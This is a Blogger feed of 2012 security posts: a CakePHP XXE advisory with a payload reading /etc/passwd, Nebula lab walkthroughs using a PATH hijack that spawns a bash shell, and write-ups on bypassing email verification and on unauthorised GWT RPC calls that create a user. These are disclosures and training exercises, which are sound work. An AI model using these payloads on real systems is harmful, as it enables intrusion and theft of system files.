<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<br /></div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
2. Vulnerability</div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<br /></div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
CakePHP is vulnerable to XML eXternal Entity injection. The class responsible for building XML (it uses PHP SimpleXML) does allow local file inclusion.</div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<br /></div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
3. Proof of Concept</div>
<br />
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
Linux:<br />
<!DOCTYPE cakephp [<br />
<!ENTITY payload SYSTEM "file:///etc/passwd" >]><br />
<request><br />
<xxe>&payload;</xxe><br />
</request><br />
<br />
Windows:<br />
<!DOCTYPE cakephp [<br />
<!ENTITY payload SYSTEM "file:///C:/boot.ini" >]><br />
<request><br />
<xxe>&payload;</xxe><br />
</request><br />
<br />
4. Fix<br />
<br />
Fix applied in version 2.2.1 and 2.1.5. See official security release:<br />
<a href="http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1">http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1</a>
<br />
<br />
5. Timeline<br />
<br />
1.07.2012 - vulnerability reported<br />
13.07.2012 - response from CakePHP<br />
14.07.2012 - confirmed and fix release</div>
Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com1tag:blogger.com,1999:blog-4014979627879654228.post-45831823190696216962012-06-13T23:57:00.004+02:002012-06-19T13:11:53.299+02:00exploit-exercises.com walkthrough - Nebula level02So here's our challenge: <a href="http://exploit-exercises.com/nebula/level02">http://exploit-exercises.com/nebula/level02</a>.<br />
<br />
We have an environment value USER copied to the buffer without any checking. In the next step the buffer content is executed with a system() call. Basically we just need to prepare USER environment variable with a "proper" content and we are good to go:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJPVTr-B8bfNlK-W4AkOxei1x0JWlTl3ML906lFF_YajGJ7-0LlE-SQAQOLrUMW0W4mnuRulpDP7lw1BEsvUN9HRZhEHUfPHG3IdqG0ZRM11pj4Pz9zSJqCGUsj6jJtWhu8L1hCzRNhHA/s1600/walkthrough.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJPVTr-B8bfNlK-W4AkOxei1x0JWlTl3ML906lFF_YajGJ7-0LlE-SQAQOLrUMW0W4mnuRulpDP7lw1BEsvUN9HRZhEHUfPHG3IdqG0ZRM11pj4Pz9zSJqCGUsj6jJtWhu8L1hCzRNhHA/s1600/walkthrough.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">level02 walkthrough.</td></tr>
</tbody></table>
And that's all :)Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-39669748901102900852012-06-06T18:08:00.003+02:002012-06-06T18:08:45.279+02:00How to NOT implement password reminder functionA quick post about my recent discovery. I created an account on a some website and wanted to get my password reminded. There was only one step - provide e-mail address used to register.<br />
<br />
My first suprise was that the password was changed immediately without any confirmation. That means if i only knew a person e-mail i could change his password !<br />
<br />
Second surprise was the pattern that emerged when i generated few passwords (for different accounts with different passwords):<br />
<blockquote class="tr_bq" style="font-family: "Courier New",Courier,monospace;">
XS?dh*96<br />
NJ*fz!45<br />
KX$mm!73<br />
ZE*wx*98<br />
PJ*fg?93<br />
ZC?gb?4<br />
JU!ig*80<br />
YZ*vz@95<br />
DD@fy@70<br />
MX*em%72<br />
DM%cn%17</blockquote>
<span style="font-family: inherit;">[2 upper letters][special char][2 lower letters][special char][number max 2 digit]</span>.<br />
<br />
Can you spot the problem ?<br />
<ul>
<li>I am able to change someone's password knowing only his e-mail,</li>
<li>I know the generation pattern for this new password.</li>
</ul>
Based on those rules we are able to generate a dictionary file, and try to crack the password. However in this case it is not critical beacuse this is a webapplication. We have:<br />
26 x 26 x 6 x 26 x 26 x 100 = 274185600 possible combinations, so the dictionary file would be around 2.2 GB size. Yep, it seems like a lot of time, but in case of flaws in the randomness of the string generation we could probally shorten the amount of time needed to crack it - i need to examine it deeper. To sum up, it does not seem to be a threat (for now) but those patterns definitely should have not appear in that function.<br />
<br />Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-82299072906115096232012-06-02T21:33:00.003+02:002012-06-03T12:41:13.465+02:00How to NOT generate confirmation links<div style="text-align: justify;">
Today i registered an account at some company website. As usual i got an confirmation e-mail to click on, so my account would be activated.It looked like this:</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: 0px; margin-right: 0px; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT4lJHUmv0DZPsJMJ6F0A_0_zDzIbLqFX8UPKKW-82oAN5pt01Pjzwc4e4SzwfbjFdNgoxnal2t5i2XqVVAB-adWInISYa5XCP-JJ4H2EE0OaiPSQ5G_k9aS7w_c8i_Iuir5IKVyOEgOE/s1600/act_link.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT4lJHUmv0DZPsJMJ6F0A_0_zDzIbLqFX8UPKKW-82oAN5pt01Pjzwc4e4SzwfbjFdNgoxnal2t5i2XqVVAB-adWInISYa5XCP-JJ4H2EE0OaiPSQ5G_k9aS7w_c8i_Iuir5IKVyOEgOE/s1600/act_link.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">part of activation e-mail i received.</td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td><td class="tr-caption" style="text-align: center;"><br /></td></tr>
</tbody></table>
<div style="text-align: justify;">
So my first thought was to check this md5 hash ! :)</div>
<div style="text-align: justify;">
Using google i quickly got an answer:</div>
<br />
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsSDAgyk9hUoYXKrcevWCoWV0UUKRjdP864OBEJ-fNt0dR5vyV2zUZRHlty7m4vRZfFLvM2x5z2wSqA2F9I220pDvfeORbmtL6kOwf6rN2o29jX2JsyozZa_8WxRJeHOlJ8GQ6b-Uy2lE/s1600/md5hash.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsSDAgyk9hUoYXKrcevWCoWV0UUKRjdP864OBEJ-fNt0dR5vyV2zUZRHlty7m4vRZfFLvM2x5z2wSqA2F9I220pDvfeORbmtL6kOwf6rN2o29jX2JsyozZa_8WxRJeHOlJ8GQ6b-Uy2lE/s400/md5hash.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">md5 hash and the source string.</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
Hm.. interesting, so it looks like the pattern is 'mw' string + login. Let's verify this.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
First step is creating an account with non existant e-mail address.</div>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRjTxSri9ydwDXwz7iZgaLNw_bw6a0G9lHP08HmSlvQ-QBHZf2maW5kSem2FIGDDjtokplr7IWRx6cjhOsWpBVz8HbWl-1vBrKxk3aDyW7g4lmd1qbbqZEvjSBJCJceQEN7cE2lYAG3-0/s1600/register.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRjTxSri9ydwDXwz7iZgaLNw_bw6a0G9lHP08HmSlvQ-QBHZf2maW5kSem2FIGDDjtokplr7IWRx6cjhOsWpBVz8HbWl-1vBrKxk3aDyW7g4lmd1qbbqZEvjSBJCJceQEN7cE2lYAG3-0/s320/register.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">our fake input data.</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Next we generate a md5 hash for 'mwthisisfake' string and pasting the crafted url to the browser.<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-left: 0px; margin-right: auto; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDWV-SUpRa6TCfb-DZDD7V8VM4QJnm7wt5XgX7C7YdeVqm7pV7vH2_zULGka8rqWb88v_FSVy66tjbPq9IlFD-4wX-ct-Ko3RgmPVCYHn95m8ACbnu9nEqLwVPmIvGagAYD7PW5o6DSj8/s1600/act_link2.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDWV-SUpRa6TCfb-DZDD7V8VM4QJnm7wt5XgX7C7YdeVqm7pV7vH2_zULGka8rqWb88v_FSVy66tjbPq9IlFD-4wX-ct-Ko3RgmPVCYHn95m8ACbnu9nEqLwVPmIvGagAYD7PW5o6DSj8/s1600/act_link2.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">confirmation link generated by us.</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
Success!<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5TsVSrxr3csMmS7jgpXVrgzTuTIht8S-2vCpAGTACKUM6EDcMIadBt3ba0DPPDrcOmI0V2KUXCysLdQk9ZRnKoAx5A3ZYnhD94HoVOLAm_DKYKQljIVh06ykgPwiSzT1wYIPclemqIY8/s1600/dziekujemy.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5TsVSrxr3csMmS7jgpXVrgzTuTIht8S-2vCpAGTACKUM6EDcMIadBt3ba0DPPDrcOmI0V2KUXCysLdQk9ZRnKoAx5A3ZYnhD94HoVOLAm_DKYKQljIVh06ykgPwiSzT1wYIPclemqIY8/s1600/dziekujemy.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Registration confirmation info.
<br />
<br />
<br /></td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So let's see if we can log in.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWiVJcv2UOvpTmR5L4o-gssnXW51kbS9j-v15ExHzkvF7D74HGl0jvRBU60pv8o7WuwithNW7R73g30alDdITwwSqVbVVgnFFH5NvVE7Glt1DvZSMKtMccvO4Tr44GPbFAV3TAx9-PWWY/s1600/logged.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWiVJcv2UOvpTmR5L4o-gssnXW51kbS9j-v15ExHzkvF7D74HGl0jvRBU60pv8o7WuwithNW7R73g30alDdITwwSqVbVVgnFFH5NvVE7Glt1DvZSMKtMccvO4Tr44GPbFAV3TAx9-PWWY/s1600/logged.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Logged in as thisisfake user.</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Ok, so i managed to skip the e-mail verification - what's so bad about it ?<br />
<br />
First obvious conclusion is that users can create accounts without using a valid e-mail address.Also it is easier to write a script for automatic user generation (no e-mail, no captcha verification). User login enumeration is possible too. This is just a registration confirmation link, imagine what would happen if reset password function had this vulnerability (and i've seen it happend before). I'll try to continue on this topic if i find more interesting examples.<br />
<br />
<div style="text-align: justify;">
</div>Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-33238100881851476092012-04-10T21:15:00.002+02:002012-04-10T21:15:41.634+02:00exploit-exercises.com walkthrough - Nebula level01<span style="font-family: inherit;">Here's the vulnerable source code:</span><br />
<pre style="white-space: pre-wrap; word-wrap: break-word;">#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
</pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;">int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}</pre>
The binary file is located in /home/flag01/flag01. After executing it simply echoes the "and now what?" message. It's easy to spot that we have an absolute path to env but echo execution could be altered. We'll achieve this by creating a simple C program in the /home/level01:<br />
<pre style="white-space: pre-wrap; word-wrap: break-word;">#include <stdlib.h>
#include <stdio.h></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;">void main()</pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;">{
system("/bin/bash");
}</pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;"></pre>
Now we need to compile it:<br />
<blockquote class="tr_bq">
<span style="background-color: #666666;">level01@nebula:~$ gcc -o echo 1.c</span></blockquote>
In the next step we will alter the PATH variable value with the following command:<br />
<blockquote class="tr_bq">
<span style="background-color: #666666;">level01@nebula:~$ PATH=/home/level01:$PATH</span></blockquote>
All we need to do now is running flag01.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFdDjpq6ZmqIq5XoZpfM6cp0Nds8OThFoiXVTHjrIDeW_SG09Ly_9eBuge1ySClbCB7ceDXWDSdzUODxKOA47e94R-XXuUL7Do5e3Zd-U3UquoB29u_wgYkteHquAsVSNRYlOcexhJbhc/s1600/Bez%C2%A0tytu%C5%82u.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFdDjpq6ZmqIq5XoZpfM6cp0Nds8OThFoiXVTHjrIDeW_SG09Ly_9eBuge1ySClbCB7ceDXWDSdzUODxKOA47e94R-XXuUL7Do5e3Zd-U3UquoB29u_wgYkteHquAsVSNRYlOcexhJbhc/s320/Bez%C2%A0tytu%C5%82u.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">level01 completed.</td></tr>
</tbody></table>
<br />
That's it !Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com3tag:blogger.com,1999:blog-4014979627879654228.post-85310020203966035352012-03-22T18:35:00.001+01:002012-03-22T18:35:09.299+01:00[fun] Google Street View in PolandJust browsing through my neighbourhood street view and i find this:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFGkmF-P9CCEYw4Q9gbOupdSLarrYOygpVclyKkF5wQMtbFye8RvFlIzf_dREzl5aAtJpwc3tg0yW6em8tSR5LzTudKH4_xnU_thun_4hUDT9tnBxvEWUi0HYFmTPWe-F3rgENBHVl0cc/s1600/google_street_pl.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFGkmF-P9CCEYw4Q9gbOupdSLarrYOygpVclyKkF5wQMtbFye8RvFlIzf_dREzl5aAtJpwc3tg0yW6em8tSR5LzTudKH4_xnU_thun_4hUDT9tnBxvEWUi0HYFmTPWe-F3rgENBHVl0cc/s320/google_street_pl.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Graffiti censorship by Google :)</td></tr>
</tbody></table>
Face recognition algorithm fail ?: DPawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-12174089275298801432012-03-07T21:25:00.005+01:002012-07-19T08:55:45.548+02:00GWT Web App Hacking<span style="font-size: large;">Intro</span><br />
Recently i was performing a black box test of a web application. After initial reconnaissance i found nothing interesting. Basicly it was just a login screen... so i started WebScarab and sent some random credentials.<br />
This is what i saw:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPqaWTOP2Noz9zqzMTumyV-uNmts2af60L7Eyy7ce5KJrvrYP1q86GkHu4bdEx7kps-AqPdhYqE9jZqDiEhjqR066-uVjBsEzGnl7yK36oS397oQfVS2YcViY_iCoYXOFqyJc5nz1LJ6s/s1600/1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPqaWTOP2Noz9zqzMTumyV-uNmts2af60L7Eyy7ce5KJrvrYP1q86GkHu4bdEx7kps-AqPdhYqE9jZqDiEhjqR066-uVjBsEzGnl7yK36oS397oQfVS2YcViY_iCoYXOFqyJc5nz1LJ6s/s320/1.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">RPC Call authenticating user</td></tr>
</tbody></table>
This request is GWT (Google Web Toolkit) RPC Call. To get better understanding on the subject i highly recommend to read <a href="http://blog.gdssecurity.com/labs/2009/10/8/gwt-rpc-in-a-nutshell.html" target="_blank">this</a> great article. It will get really helpful when we would want to modify or send our own calls based only on method definition.<br />
<br />
<span style="font-size: large;">Enumeration</span><br />
Ok, so i wrote about method definitions earlier. Right, we need to retrieve them from, a javascript file (usually obfuscated).JS file has a "nocache" pattern in its name, you will find the URL in page source. To retrieve those we will use a tool called gwtenum from <a href="https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset" target="_blank">GWT-Penetration-Testing-Toolset</a>.<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: #444444; font-family: 'Courier New', Courier, monospace;">python gwtenum.py -u "https://example.com/xx.nocache.js"</span></blockquote>
As a result we get 50 methods like:<br />
<pre class="brush:java;"> DataService.ChangePass( java.lang.String/2004016611, ... ) *
DataService.DeleteUser( java.lang.String/2004016611 )
DataService.addUser( ... ) *
DataService.getFirms( )
</pre>
*Dots indicate longer list of paremeters.
Now it got intersting...
What we can do with this knowlegde? As seen on the first screenshot CheckUser() method was called.
We can try to call methods from the list. If the application does not handle permissions correctly we will succeed. Our best wish is addUser() method - because we want to get in. First problem that appears is that we don't know the parameter order, in methods like DeleteUser() or getFirms() it's rather trivial, but addUser() takes 6 parameters - all string type.<br />
<br />
<span style="font-size: large;">Attack</span><br />
<br />
<span style="font-family: inherit;">Let's start with something easy, like calling getFirms(), as we don't wan't to delete users from client productive system :). We start intercepting request again using WebScarab and transform CheckUser call into getFirms().
</span><br />
<br />
<div style="text-align: center;">
<span style="background-color: #444444; font-family: 'Courier New', Courier, monospace;">7|0|4|https://example.com/xx.xyz.Main/|185Bxxx|xx.xx.rpc.DataService|getFirms|1|2|3|4|0|</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC_GNGwEtZ9wYjavtja0D3cGzrWTCDyjVWH0bxQtRUuWgncaeWAdkL-T5dbhW-OKPvmJTMFz_he0pT8HnngaTJwJ5_L6PRbRT1HsssbMDU9-ivhF5iLPQbxWUE1VHWCj9oIeeqcRyKF8k/s1600/Bez%C2%A0tytu%C5%82u.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC_GNGwEtZ9wYjavtja0D3cGzrWTCDyjVWH0bxQtRUuWgncaeWAdkL-T5dbhW-OKPvmJTMFz_he0pT8HnngaTJwJ5_L6PRbRT1HsssbMDU9-ivhF5iLPQbxWUE1VHWCj9oIeeqcRyKF8k/s320/Bez%C2%A0tytu%C5%82u.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Results of getFirms() call - success !
</td></tr>
</tbody></table>
<br />
We changed the parameters of the rpc call (explained in the article linked earlier) so it would not throw an exception and voila!<br />
<br />
So, it's possible to call methods unauthorized - what about addUser() ? Since all parameters are strings let's just fill them out with the word 'pentest'.<br />
<br />
<div style="text-align: center;">
<span style="background-color: #444444; font-family: 'Courier New', Courier, monospace;">7|0|7|https://example.com/xx.xyz.Main/|185Bxxx|xx.xx.rpc.DataService|addUser|java.lang.String|/2004016611|S|pentest|1|2|3|4|6|5|5|5|5|5|6|7|7|7|7|7|7|</span>
</div>
<div style="text-align: center;">
<span style="background-color: #444444; font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nBfkPD9LacxHAYZBeXL2FEJwEfXJ3QaPcK4lNVvlHa8xOOxp0xz4GWS3lAvs1uS_0CWv_LOPTcgtgdXV8CXAdX1q2PDNrzTf5PtOv8jtvwjDd708CenBQJzKKtGZoIwFwBhboA19GGE/s1600/3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nBfkPD9LacxHAYZBeXL2FEJwEfXJ3QaPcK4lNVvlHa8xOOxp0xz4GWS3lAvs1uS_0CWv_LOPTcgtgdXV8CXAdX1q2PDNrzTf5PtOv8jtvwjDd708CenBQJzKKtGZoIwFwBhboA19GGE/s320/3.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Successful login with user/pass "pentest"!</td></tr>
</tbody></table>
<div style="text-align: left;">
<span style="font-family: inherit;">We managed to create a user remotely on the sytem and were able to log in!</span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">pwnt.</span></div>
<br />Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com1tag:blogger.com,1999:blog-4014979627879654228.post-19774848193389253362012-03-05T11:52:00.001+01:002012-03-05T11:53:02.100+01:00Kelihos botnet - mostly located in PolandRecent post on <a href="https://www.abuse.ch/?p=3658" target="_blank">abuse.ch</a> about the comeback of Kelihost botnet shows some interesting statistics. Most of the host are located in Poland. 279 out of 809 hosts to be more specific. Below a list of big polish internet providers:<br />
<br />
<ul>
<li>UPC - 91 hosts</li>
<li>Vectra Technologie S.A. - 42</li>
<li>Multimedia Polska Sp. z o.o. - 41</li>
<li>Telokomunikacja Polska S.A. - 38</li>
<li>PTK Centertel Sp. z o.o. - 11</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9wUSBMbCnZupwW9GEBjpJHxWWy1WsJ8JfX4QmilAMep_1wcrwg3LoEXF5fBWV2LN8bynZ_ULzfMKiadCe6HBh-vmbzmaqrrcxvi9P17TiJgSFMYaaFIwDsmAFrMW9WGMTATpdqlMLAss/s1600/kelihos_Botnet_GeoLocation.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9wUSBMbCnZupwW9GEBjpJHxWWy1WsJ8JfX4QmilAMep_1wcrwg3LoEXF5fBWV2LN8bynZ_ULzfMKiadCe6HBh-vmbzmaqrrcxvi9P17TiJgSFMYaaFIwDsmAFrMW9WGMTATpdqlMLAss/s320/kelihos_Botnet_GeoLocation.png" width="284" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Source: <a href="https://www.abuse.ch/?p=3658" target="_blank">abuse.ch</a></td></tr>
</tbody></table>
<div>
<br /></div>Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-89470897865824027322012-02-22T17:48:00.000+01:002012-02-22T18:02:53.778+01:00exploit-exercises.com walkthrough - Nebula level00"exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such a privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering." - quote from project homepage<br />
<div>
<br />
We will start from level00. I assume You already have the Nebula VM and know the rules.</div>
<div>
<br /></div>
<div>
<a href="http://exploit-exercises.com/nebula/level00">http://exploit-exercises.com/nebula/level00</a> - After log in as level00 user We follow a hint from level's page and type the following command:</div>
<blockquote class="tr_bq">
<span style="background-color: #666666;">find / -perm -4000 2> /dev/null</span></blockquote>
and got the results:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKH5oVmJllvnqx_UszGGl-p7z-LFmjs5_Z07_OGP9cWCsJEvPQ5_3sLJIo0TcFxXZ75298ORL9RvGCe9YMC5fpZA6OH3_L3zlmyCZhTtvUIP2zvpfcKHOm1pGJ-FytZV87jQpRjdFDfPs/s1600/find.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKH5oVmJllvnqx_UszGGl-p7z-LFmjs5_Z07_OGP9cWCsJEvPQ5_3sLJIo0TcFxXZ75298ORL9RvGCe9YMC5fpZA6OH3_L3zlmyCZhTtvUIP2zvpfcKHOm1pGJ-FytZV87jQpRjdFDfPs/s320/find.jpg" width="320" /></a></td></tr>
